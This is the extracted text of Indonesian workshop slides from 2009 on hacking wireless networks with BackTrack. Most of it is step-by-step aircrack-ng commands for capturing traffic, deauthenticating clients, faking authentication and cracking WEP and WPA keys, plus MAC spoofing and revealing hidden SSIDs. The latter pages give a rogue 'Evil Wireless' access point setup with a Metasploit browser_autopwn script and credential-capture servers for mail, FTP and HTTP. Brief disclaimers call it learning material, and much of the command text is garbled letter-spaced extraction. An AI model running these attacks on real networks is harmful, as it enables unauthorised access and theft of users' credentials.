materi workshop wifi hacking with backtrack unair des 2009
DESCRIPTION
Cara dan panduan hacking dengan backtrackTRANSCRIPT
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
1/28
Wireless Hacking,
Web Hacking&
Security System
Oleh :
Nathan Gusti Ryan
We give you Solution with our eXPerienceWe give you Solution with our eXPerienceWe give you Solution with our eXPerienceWe give you Solution with our eXPerienceIT Training Software Hardware Technical Support Networking Server System
Website: www.xp-solution.com Email: [email protected]
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
2/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
About Workshop Wifi Hacking
Materi ini merupakan kelanjutan dari Seminar Networking Security yang dibawakan oleh Pakar IT Nasional
Bpk Onno. W. Purbo di Universitas Airlangga tanggal 29 November 2009. Materi Wifi Hacking ini sebagaiWorkshop dari Demo yang dibawakan dalam Seminar tersebut.
Workshop atau Pelatihan Hacking bertujuan untuk mempelajari dan mendalami serta mempaktekkan System
Kerja atau Teknik Kerja seorang Hacker dalam menemukan celah keamanan atau Hole security suatu jaringan
wireless milik orang lain. Pengetahuan dan wawasan tentang Wifi Hacking ini diharapkan dapat menjadi
pengetahuan peserta workshop sehingga mampu menutup celah keamanan yang dapat diterobos oleh hacker
atau oleh orang lain sehingga Wireless Network atau Jaringan kerja yang dibangunnya betul betul jaringan
yang kuat proteksi keamanannya.
Simplenya adalah cara menjadi seorang polisi yang handal tentu harus memahami berbagai teknik kejahatan
yang dilakukan oleh penjahat yang handal. Sehingga mampu memberikan perlindungan dan menjaga
keamanan serta mampu meng-identifikasikan + menangkal + menangkap penjahat tersebut.
Dalam Workshop ini di focuskan pada pengunaan Linux BackTrack, baik BackTrack versi 4 maupun BackTrack
versi 3 Bootable USB Flashdisk. BackTrack @ Flasdisk sangat simple dan praktis sehingga dapat digunakan
setiap saat tanpa menganggu OS Laptop yang kita gunakan.
About Internet & Websites Hacking
Materi Workshop Hacking ini sebagai preview adanya berbagai celah keamanan yang memungkinkan sebuah
websites dapat di ambil alih oleh orang lain dengan SQL Injection yang memanfaatkan paramater dari
Database SQL sehingga hacker dapat memperoleh Username + Password ADMIN atau meng-inject Username
+ Password yang dapat menguasai websites tersebut.
Carding dan SQL Injection Database Hacking
eCommerceyang semakin berkembang dalam transaksi perdagangan via internet yang menjadikan eMoney
atau Virtual Money semakin diminati dan terus melejit semacam Paypal karena banyak dibutuhkan dalam
bisnis di internet. Begitu juga transaksi mengunakan Kartu Kredit yang memungkinkan adanya celah keamanan
dalam eCommercesehingga para pemain bisnis internet harus lebih waspada. Hal inilah yang mengharuskan
setiap orang memahami adanya berbagai Teknik Cardingmaupun SQL Injection terhadap data transaksi
sehingga dapat merugikan pihak lain.
By Nathan Gusti Ryan
http://artikel.xcode.or.id # http://jamesbond.xcode.or.id
www.xp-solution.com
http://artikel.xcode.or.id/http://jamesbond.xcode.or.id/http://www.xp-solution.com/http://www.xp-solution.com/http://jamesbond.xcode.or.id/http://artikel.xcode.or.id/ -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
3/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Joomla Hacking
Joomla Click Jacking adalah berbagai Trik yang memungkinkan menjadi hole dari websites yang dibangun
dengan Websites Joomla CMSsehingga berbagai hal yang dapat menembus Administrator Joomla.
Membuat BackTrack Bootable USB FD
Cara membuat Bootable USB FD sangat lah mudah.
1. Buka File ISO BackTrack USB dengan MagicISOatau PowerISO.2. Copy-kan semua file dari ISO tersebut ke sebuah Flashdisk 1 GB Format yang telah di format.3. Keluar dari program MagicISO atau PowerISO lalu buka flashdisk tersebut dengan Windows Explorer.4. Jalankan file BOOTINST.BAT, dan setelah selesai maka Bootable Flashdisk siap digunakan.
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
4/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
5/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
TAHAPAN WIFI HACKING
Tahapan yang harus dilakukan untuk Hacking Wifi adalah sbb :
1. AirMonitoring / AirScanning.2. AirCapturing / AiroDump.3. AirCracking.4. AirConnecting.5. AddOn : Mac Clonning.
Pertama kita cek dulu status driver wifi kita dengan perintah "airmon-ng"
Fungsinya untuk => cek wifi device & driver
Terlihat driver wireless adapter kita sebagai wifi0. Selanjutnya kita jika ada interface lain seperti ath0, kita
hapus dengan perintah "airmon-ng stop ath0"
Fungsinya untuk => menghentikan koneksi eksisting dan virtual driver interface wifi ath0
Selanjutnya kita cek lagi driver wifi yang masih eksis dengan perintah "airmon-ng"
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
6/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Sekarang kita akan buat virtual wifi interface dengan perintah "airmon-ng start wifi0"
Fungsinya untuk => menciptakan sebuah virtual wifi interface dari wireless interface wifi0
Nah setelah tercipta virtual wifi interface dengan nama ath0, maka selanjutnya kita akan melakukan scanning
wifi network yang ada disekitar kita dengan perintah "airodump-ng ath0"
Fungsinya untuk => perintah untuk melakukan scanning wifi network yg ada disekitar kita.
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
7/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Selanjutnya muncul daftar Wifi Network / BSSID, Power, Mac Address AP / ESSID, Channel yang digunakan
masing2 AP, Bandwith Speed, Jenis Enkripsi (WEP, OPN, WPA, WPA2), Jenis Authentikasi (PSK, TKIP), Nama
Wifi Network / ESSID.
=> Serta muncul muncul Mac Address ESSID dan Mac Address Station / Client yg sedang Connect
#airodump-ng ath0
CH 7 ] [ Elapsed: 16 s ] [ 2009-12-01 18:31
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1E:E5:99:E1:3E 47 5 0 0 13 54. WPA2 CCMP PSK BhiNetwork-Linksys-IT00:1A:70:95:AB:1A 19 25 0 0 6 54. WPA TKIP PSK BhiNetwork-Linksys00:C0:02:FF:F1:AC 59 34 18 0 1 11 WEP WEP FREE-HOTSPOT
BSSID STATION PWR Rate Lost Packets Probes
00:C0:02:FF:F1:AC 00:1D:0F:BA:DA:2D 54 0-11 0 1 FREE-HOTSPOT
=> perintah ini untuk melakukan proses scanning wifi network channel 1 / airodump serta mencatat semua
paket data di channel 1 tsb.
#airodump-ng --channel 1 --bssid 00:11:22:33:44:55 -w hasilcap ath0
--channel 1 => Channel yang ditampilkan
--bssid00:11:22:33:44:55 => Mac Address dari AP yang ditampilkan
-whasilcap => file output dari hasil scanning
ath0 => virtual wifi interface
--ivs => format penyimpanan hasil capture sebagai file ivs
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
8/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
9/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
#aircrack-ng hasilcap.cap
Fungsinya => untuk menganalisa hasil capture packet dari airdump.
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
10/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Kita juga bisa melakukan monitoring jaringan wireless ini mengunakan Kismet
Selanjutnya kita akan melihat Clientyang terkoneksi ke Access Point ini :Tekan space
S - untuk men-sort
S - untuk men-sort terhadap SSID
Tekan Panah Bawah - Letakan di SSIDAPyang kita inginkan.
ENTER - detailAP
C - lihat siapa saja clientAPtersebut
Selanjutnya akan terlihat daftar Client seperti dibawah ini :
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
11/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
12/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
AIREPLAY
bt ~ # aireplay-ng
Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'OtreppeOriginal work: Christophe Devinehttp://www.aircrack-ng.org
usage: aireplay-ng
Filter options:
-b bssid : MAC address, Access Point-d dmac : MAC address, Destination-s smac : MAC address, Source-m len : minimum packet length-n len : maximum packet length-u type : frame control, type field-v subt : frame control, subtype field-t tods : frame control, To DS bit-f fromds : frame control, From DS bit-w iswep : frame control, WEP bit-D : disable AP detection
Replay options:
-x nbpps : number of packets per second-p fctrl : set frame control word (hex)-a bssid : set Access Point MAC address-c dmac : set Destination MAC address-h smac : set Source MAC address-g value : change ring buffer size (default: 8)-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID-o npckts : number of packets per burst (0=auto, default: 1)-q sec : seconds between keep-alives-y prga : keystream for shared key auth
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
source options:
-i iface : capture packets from this interface-r file : extract packets from this pcap file
attack modes (Numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
http://www.aircrack-ng.org/http://www.aircrack-ng.org/ -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
13/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
--fakeauth delay : fake authentication with AP (-1)--interactive : interactive frame selection (-2)--arpreplay : standard ARP-request replay (-3)--chopchop : decrypt/chopchop WEP packet (-4)--fragment : generates valid keystream (-5)--caffe-latte : query a client for new IVs (-6)--cfrag : fragments against a client (-7)--test : tests injection and quality (-9)
--help : Displays this usage screen
############
#aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 01:12:23:34:45:56 ath0
-b => MAC AP / BSSID
-h => MAC Source / MAC Wifi kita
-c / -d => MAC Client / Destination
ath0 => virtual wifi interface
Fungsinya => Untuk mempercepat proses pengiriman packet data dari Client ke AP
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
14/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Deauthentikasi Aireplay :
Fungsinya => Untuk menghentikan koneksi dari Client ke AP sehingga Airdump dapat melakukan capture dari
koneksi awal dari Client ke AP.
=> (Serangan utk Disconnect & Reconnect koneksi suatu client ke AP)
#aireplay-ng --deauth 10 -a 00:80:48:7E:CC:57 -c 02:19:FC:01:00:C4 ath0
10 => jumlah deauthentikasi / penyerangan yang akan dilakukan
-a => MAC AP
-c => MAC Client / Workstation
Menganti Mac Address Interface Wifi :
bt ~ # macchanger -A wifi0
Current MAC: a2:9b:5c:b2:de:70 (unknown)
Faked MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)
bt ~ # macchanger -s wifi0
Current MAC: 00:e0:06:6f:d4:da (Silicon Integrated Sys. Corp.)
bt ~ # macchanger -m 00:21:63:ad:7c:3a wifi0
Current MAC: 00:21:63:ad:7c:3b (unknown)
Faked MAC: 00:21:63:ad:7c:3a (unknown)
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
15/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Menyambung ke HotSpot
Untuk menyambungkan diri ke HotSpotmenggunakan text mode. Langkah yang biasa digunakan
1. Scanning frekuensi
# i wl i st scanni ng
2. Set ESSIDinterface wireless(misalnya eth1) agar sama dengan HotSpot
# i wconf i g eth1 essi d HotSpotSSI D
3. Cek apakah sudah tersambung
# i wconf i g eth1
4. Minta IP addresske DHCP Server
# dhcl i ent et h1
Beberapa Cara untuk Cek Sambungan
1. Cek apakah routingke Internetsudah di berikan oleh DHCP Server. Perhatikan IP gatewayuntuk
tujuan 0.0.0.0 apakah sudah di berikan, menggunakan perintah,
# net st at - nr
2. Ping ke gatewayHotSpot
# pi ng
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
16/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Scanning HotSpot
Scanning Keberadaan HotSpotdapat dilakukan menggunakan text mode.
iwlist
Cara yang paling sederhana adalah menggunakan perintah
# i wl i st scanni ng
Kismet
cara yang lebih rumit menggunakan kismet
# apt - get i nst al l ki smet# vi / et c/ ki smet / ki smet . confsource=none, none, addme - - > source=i pw3945, wl an0, i pwsourcesource=none, none, addme - - > source=zd1211, eth1, zysour cesource=none, none, addme - - > source=at h5k, at h0, at hsour ce
Baca http://www.kismetwireless.net/documentation.shtmluntuk melihat source yang dikenali Kismet
# ki smet
airodump
Mematikan mode monitordi WLANinterface
# ai r mon-ng st op wl an0
Mengaktifkan mode monitordi WLANinterface
# ai r mon- ng st ar t wl an0 1
Akan keluar kira-kira
I nt er f ace Chi pset Dr i verwl an0 I ntel 3945ABG i wl 3945 - [ phy0]
( moni t or mode enabl ed on mon2)mon0 I ntel 3945ABG i wl 3945 - [ phy0]mon1 I ntel 3945ABG i wl 3945 - [ phy0]
Scanning
# ai r odump- ng mon0
http://www.kismetwireless.net/documentation.shtmlhttp://www.kismetwireless.net/documentation.shtml -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
17/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WEP Menggunakan
Airodump dan Aircrack
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya diperuntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan
untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak
tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan
aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut inimembutuhkan trafficpaket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang
melakukan transfer file di jaringan HotSpot. Jika tidak ada trafficsama sekali, sampai kapanpun akan
susah untuk di crackWEP-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID/ MAC AddresssAP, (2) MAC addressWLANkita, dan (3) Channelyang digunakan AP.
Misalnya,
BSSI D 00: 30: 4F: 4E: 2B: 50WI FI 00: 11: 6b: 33: d3: 90CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00: 30: 4F: 4E: 2B: 50export WI FI =00: 11: 6b: 33: d3: 90expor t CHANNEL=1
Setup supaya interface WiFimasuk ke mode monitoring menggunakan perintah
ai r mon- ng st art wl an0 1
Biasanya akan tampil kira-kira sebagai berikut
I nt er f ace Chi pset Dr i verwl an0 I ntel 3945ABG i wl 3945 - [ phy0]
( moni t or mode enabl ed onmon0)
Perhatikan baik-baik bahwa interfacewlan0yang berubah menjadi mode monitor adalah mon0. Kita
harus menggunakan interface mon0untuk melakukan monitor.
Jalankan airodumpdi WLANmon0
ai r odump- ng - - i vs - w hasi l capt ur e - - bssi d $AP - - channel $CHANNEL mon0
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
ai r odump- ng - - out put - f ormat i vs - w hasi l capt ur e - - bssi d $AP - - channel $CHANNELmon0
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
18/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses
cracking WEPpastikan kita dapat menangkap lebih dari 5000 paket.
Jalankan aircrackuntuk mengcrack WEP
# ai r cr ack- ng - a 1 - e essi dapyangakandi cr ack - n 64 hasi l capt ur e- 01. i vs
misalnya
# ai r cr ack- ng - a 1 - e l i nksys - n 64 hasi l capt ur e- 01. i vs# ai r cr ack- ng - a 1 - e $AP - n 64 hasi l capt ur e- 01. i vs
Bisa juga menggunakan perintah
# ai r cr ack- ng - a 1 - n 64 hasi l capt ur e- 01. i vs
Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP
Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang
sedang transfer file di jaringan HotSpot.
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
19/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WEPInformasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan
untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak
tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan
aparat penegak hukum.
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID/ MAC AddresssAP, (2) MAC addressWLANkita, dan (3) Channel yang digunakan AP.
Misalnya,
BSSI D 00: 30: 4F: 4E: 2B: 50WI FI 00: 11: 6b: 33: d3: 90
CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan
# expor t AP=00: 30: 4F: 4E: 2B: 50# expor t WI FI =00: 11: 6b: 33: d3: 90# expor t CHANNEL=1
Teknik mencari data BSSID& CHANNELdi atas menggunakan perintah, misalnya, card WLANdi
eth1. Pastikan bahwa eth1 berada pada mode monitor
# i wconf i g et h1 mode moni t or# i wconf i g eth1# ai r mon- ng st ar t eth1# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Teknik selanjutnya membutuhkan kemampuan untuk berasosiasi dengan Access Point, sayangnya
biasanya sukar untuk dapat berasosiasi dengan Access Pointyang terenkripsi. Jika ada bug di Access
Point, kita bisa lakukan fake authentication seolah-olah kita telah bergabung ke Access Pointtersebut
# ai r epl ay- ng - 1 0 - e ssi daccesspoi nt - a $AP - h $WI FI et h1
Jika berhasil authentikasi, kita dapat membuat packet palsu yang akan kita gunakan untuk
memanipulasi traffic paket yang lewat dari / menuju access point. Perintah yang digunakan adalah
# ai r epl ay- ng - 5 - b $AP - h $WI FI eth1
Setelah kita cukup banyak berhasil menangkap paket. Proses crackingWEPdapat dilakukan
menggunakan
# ai r cr ack- ng - a 1 - n 64 hasi l capt ur e. i vs
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
20/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Menjebol WPA
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan
untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak
tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan
aparat penegak hukum.
Menjebol WPAhampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa mencoba
langkah berikut walaupun tidak ada jaminan sama sekali bahwa anda dapat menjebol-nya.
Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID/ MAC AddresssAP, (2) MAC addressWLANkita, dan (3) Channelyang digunakan AP.
Misalnya,
BSSI D 00: 30: 4F: 4E: 2B: 50WI FI 00: 11: 6b: 33: d3: 90CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00: 30: 4F: 4E: 2B: 50export WI FI =00: 11: 6b: 33: d3: 90expor t CHANNEL=1
Setup supaya interface WiFimasuk ke mode monitoring menggunakan perintah
ai r mon- ng st art wl an0 1
Biasanya akan tampil kira-kira sebagai berikut
I nt er f ace Chi pset Dr i verwl an0 I ntel 3945ABG i wl 3945 - [ phy0]
( moni t or mode enabl ed onmon0)
Perhatikan baik-baik bahwa interfacewlan0yang berubah menjadi mode monitor adalah mon0. Kita
harus menggunakan interface mon0untuk melakukan monitor.
Jalankan airodumpdi WLANmon0
ai r odump-ng - w hasi l capture - - bssi d $AP - - channel $CHANNEL mon0
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
ai r odump- ng - - out put - f ormat pcap - w hasi l capt ur e - - bssi d $AP - - channel $CHANNELmon0
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng
ai r epl ay- ng - 0 1 - a 00: 14: 6C: 7E: 40: 80 - c 00: 0F: B5: FD: FB: C2 mon0
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
21/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Dimana :
- a MAC AP- c MAC cl i ent
Kunci dari proses cracking WPAadalah ketersediaan kamus silahkan di cek ke
http://www.aircrack-ng.org/doku.php?id=faq http://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_network http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture.
Jalankan aircrackuntuk meng-crack WPA
# ai r cr ack- ng - w kamuspass. t xt - b 00: 14: 6C: 7E: 40: 80 psk*. cap- b MAC BSSI D
Versi yang lebih panjang
# ai r cr ack- ng - a 2 - e essi dapyangakandi cr ack - n 64 hasi l capt ur e* - w kamuspass. t xt# ai r cr ack- ng - a 2 - e l i nksys - n 64 hasi l capt ur e* - w kamuspass. t xt# ai r cr ack- ng - a 2 - e $AP - n 64 hasi l capt ur e* - w kamuspass. t xt
Bisa juga menggunakan perintah
# ai r cr ack- ng - a 2 - n 64 hasi l capt ur e* - w kamuspass. t xt
Switch -a 2 digunakan untuk menset aircrack-ng agar meng-crack WPA
http://www.aircrack-ng.org/doku.php?id=faqhttp://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_networkhttp://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlistshttp://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlistshttp://www.aircrack-ng.org/doku.php?id=faq#how_can_i_crack_a_wpa-psk_networkhttp://www.aircrack-ng.org/doku.php?id=faq -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
22/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Menemukan Hidden SSID
Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di
peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan
untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak
tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan
aparat penegak hukum.
Cara yang paling ampuh untuk menemukan Hidden SSIDadalah menggunakan kismet
# ki smet
Hidden SSIDakan berwarna biru dan di tutup oleh tanda seperti tampak pada gambar.
tampilan kismet, warna biru adalah Hidden SSID
Bagi anda yang cukup beruntung dapat juga menggunakan cara di bawah ini. Tapi kemungkinan gagal
lumayan tinggi.
Pertama, scanning frekuensipada WLANdi eth1
# ai r mon- ng st op eth1# ai r mon- ng st ar t eth1
# ai r odump- ng et h1
Jalankan airodump-ng terus menerus di sebuah Windows.
Pada Windows yang lain lakukan aireplay asumsinya AP dengan MAC 00:11:6B:60:86:91 melalui
eth1
# ai r epl ay- ng - - deaut h 1 - a 00: 11: 6B: 60: 86: 91 et h1
Nanti akan keluar BSSIDdi airodump-ng
http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking
http://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hackinghttp://opensource.telkomspeedy.com/wiki/index.php/Wireless_Hacking -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
23/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
Teknik Man-in-The-Middle Attack / FakeAP
Contents
1 Versi Singkat membuat Fake AP 2 Versi lengkap untuk MiTM attack
3 Referensi 4 Pranala Menarik
Versi Singkat membuat Fake APai r base- ng - e "Free Wi Fi " - P -C 30 - v wl an0
Versi lengkap untuk MiTM attack
Siapkan software yang di butuhkan
sudo apt - get i nst al l subver si on
Summary perintah yang digunakan
svn co ht t p: / / t r ac. ai rcr ack- ng. or g/ svn/ t runk/ ai r cr ack- ngcd ai r crack- ng/makemake i nst al lsudo su -ai r mon- ng st art wl an0ai r base- ng - e "Evi l Wi r el ess" - v mon0 &i f conf i g at 0 10. 0. 0. 1 net mask 255. 255. 255. 0
apt - get i nst al l dhcp3- ser vervi / et c/ dhcp3/ evi l - wi r el ess. confopt i on domai n- name- server s 10. 0. 0. 1;
def aul t - l ease- t i me 60;max- l ease- t i me 72;
ddns- updat e- st yl e none;
aut hor i t at i ve;
l og- f aci l i ty l ocal 7;
subnet 10. 0. 0. 0 netmask 255. 255. 255. 0 {r ange 10. 0. 0. 100 10. 0. 0. 254;opt i on r out er s 10. 0. 0. 1;opt i on domai n- name- server s 10. 0. 0. 1;}dhcpd3 - cf / et c/ dhcp3/ evi l - wi r el ess. confi f conf i g mon0 mt u 1800i f conf i g at0 mt u 1400svn co ht t p: / / met aspl oi t . com/ svn/ f r amewor k3/ t r unk msf 3(butuh waktu lama & bandwidth)
Menggunakan gems rupanya rewel & belum stabil :( ..
apt - get i nst al l r ubygemsgem i nst al l acti ver ecor d sql i t e3- r uby (butuh waktu lama & bandwidth)vi evi l wi rel ess. rc
http://trac.aircrack-ng.org/svn/trunk/http://metasploit.com/svn/framework3/trunkhttp://metasploit.com/svn/framework3/trunkhttp://trac.aircrack-ng.org/svn/trunk/ -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
24/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
l oad db_sql i t e3db_creat e / r oot / evi l wi r el ess. db
use auxi l i ary/ server / br owser_aut opwn
set g AUTOPWN_HOST 10. 0. 0. 1set g AUTOPWN_PORT 55550set g AUTOPWN_URI / ads
set LHOST 10. 0. 0. 1set LPORT 45000set SRVPORT 55550set URI PATH / ads
r un
use auxi l i ar y/ ser ver / capt ur e/ pop3set SRVPORT 110set SSL f al ser un
use auxi l i ar y/ ser ver / capt ur e/ pop3
set SRVPORT 995set SSL t r uer un
use auxi l i ar y/ ser ver / capt ur e/ f t pr un
use auxi l i ar y/ ser ver / capt ur e/ i mapset SSL f al seset SRVPORT 143r un
use auxi l i ar y/ ser ver / capt ur e/ i map
set SSL t r ueset SRVPORT 993r un
use auxi l i ar y/ ser ver / capt ur e/ smt pset SSL f al seset SRVPORT 25r un
use auxi l i ar y/ ser ver / capt ur e/ smt pset SSL t r ueset SRVPORT 465r un
use auxi l i ar y/ ser ver / f akednsunset TARGETHOSTset SRVPORT 5353r un
use auxi l i ar y/ ser ver / f akednsunset TARGETHOSTset SRVPORT 53r un
use auxi l i ar y/ ser ver / capt ur e/ ht t pset SRVPORT 80
set SSL f al ser un
use auxi l i ar y/ ser ver / capt ur e/ ht t pset SRVPORT 8080
-
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
25/28
WIFI & INTERNET HACKING OLEH NATHAN GUSTI RYAN ONNO W. PURBO @ UNAIR Desember 4-5, 2009
set SSL f al ser un
use auxi l i ar y/ ser ver / capt ur e/ ht t pset SRVPORT 443set SSL t r uer un
use auxi l i ar y/ ser ver / capt ur e/ ht t p
set SRVPORT 8443set SSL t r uer un. / msf consol e - r evi l wi rel ess. r c
Referensi
http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html
http://0x80.org/blog/?p=131- The Evil Access Point http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html-
How to create Face AP
http://ww2.mastaputa.com:9999/?p=29 http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-
airchat
http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-http://0x80.org/blog/?p=131http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.htmlhttp://ww2.mastaputa.com:9999/?p=29http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-http://ww2.mastaputa.com:9999/?p=29http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.htmlhttp://0x80.org/blog/?p=131http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing- -
7/13/2019 Materi Workshop Wifi Hacking With Backtrack Unair Des 2009
26/28
